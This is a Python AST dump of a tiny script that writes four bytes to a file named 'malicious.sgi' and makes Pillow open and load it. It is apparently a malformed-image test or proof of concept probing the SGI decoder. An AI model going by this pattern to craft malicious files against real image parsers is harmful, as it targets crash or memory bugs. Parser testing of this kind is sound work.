Module(
    body=[
        ImportFrom(
            module='PIL',
            names=[
                alias(name='Image')],
            level=0),
        With(
            items=[
                withitem(
                    context_expr=Call(
                        func=Name(id='open', ctx=Load()),
                        args=[
                            Constant(value='malicious.sgi'),
                            Constant(value='wb')],
                        keywords=[]),
                    optional_vars=Name(id='f', ctx=Store()))],
            body=[
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='f', ctx=Load()),
                            attr='write',
                            ctx=Load()),
                        args=[
                            Constant(value=b'\x01\x01\x01\x01')],
                        keywords=[]))]),
        Assign(
            targets=[
                Name(id='img', ctx=Store())],
            value=Call(
                func=Attribute(
                    value=Name(id='Image', ctx=Load()),
                    attr='open',
                    ctx=Load()),
                args=[
                    Constant(value='malicious.sgi')],
                keywords=[])),
        Expr(
            value=Call(
                func=Attribute(
                    value=Name(id='img', ctx=Load()),
                    attr='load',
                    ctx=Load()),
                args=[],
                keywords=[]))],
    type_ignores=[])